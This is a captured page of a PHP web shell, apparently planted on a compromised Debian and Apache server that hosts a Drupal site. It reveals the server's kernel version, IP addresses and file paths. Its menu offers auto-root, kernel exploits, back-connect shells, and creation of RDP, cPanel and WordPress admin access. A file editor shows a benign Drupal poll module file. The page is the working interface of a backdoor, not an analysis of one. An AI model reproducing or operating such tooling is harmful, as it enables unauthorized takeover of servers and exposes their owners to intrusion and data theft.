Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.119.116.77
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
entity /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
book.info.inc
890
B
-rw-r--r--
callbacks.inc
33.06
KB
-rw-r--r--
comment.info.inc
6.26
KB
-rw-r--r--
field.info.inc
7.16
KB
-rw-r--r--
locale.info.inc
1.43
KB
-rw-r--r--
node.info.inc
5.82
KB
-rw-r--r--
poll.info.inc
1.65
KB
-rw-r--r--
statistics.info.inc
1.32
KB
-rw-r--r--
system.info.inc
4.49
KB
-rw-r--r--
taxonomy.info.inc
4.27
KB
-rw-r--r--
user.info.inc
3.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : poll.info.inc
<?php /** * @file * Provides info about poll nodes. */ /** * Implements hook_entity_property_info_alter() on top of poll module. * * @see entity_entity_property_info_alter() */ function entity_metadata_poll_entity_property_info_alter(&$info) { $properties = &$info['node']['bundles']['poll']['properties']; $properties['poll_votes'] = array( 'label' => t("Poll votes"), 'description' => t("The number of votes that have been cast on a poll node."), 'type' => 'integer', 'getter callback' => 'entity_metadata_poll_node_get_properties', 'computed' => TRUE, ); $properties['poll_winner'] = array( 'label' => t("Poll winner"), 'description' => t("The winning poll answer."), 'getter callback' => 'entity_metadata_poll_node_get_properties', 'sanitize' => 'filter_xss', 'computed' => TRUE, ); $properties['poll_winner_votes'] = array( 'label' => t("Poll winner votes"), 'description' => t("The number of votes received by the winning poll answer."), 'type' => 'integer', 'getter callback' => 'entity_metadata_poll_node_get_properties', 'computed' => TRUE, ); $properties['poll_winner_percent'] = array( 'label' => t("Poll winner percent"), 'description' => t("The percentage of votes received by the winning poll answer."), 'getter callback' => 'entity_metadata_poll_node_get_properties', 'type' => 'decimal', 'computed' => TRUE, ); $properties['poll_duration'] = array( 'label' => t("Poll duration"), 'description' => t("The length of time the poll node is set to run."), 'getter callback' => 'entity_metadata_poll_node_get_properties', 'type' => 'duration', ); }
Close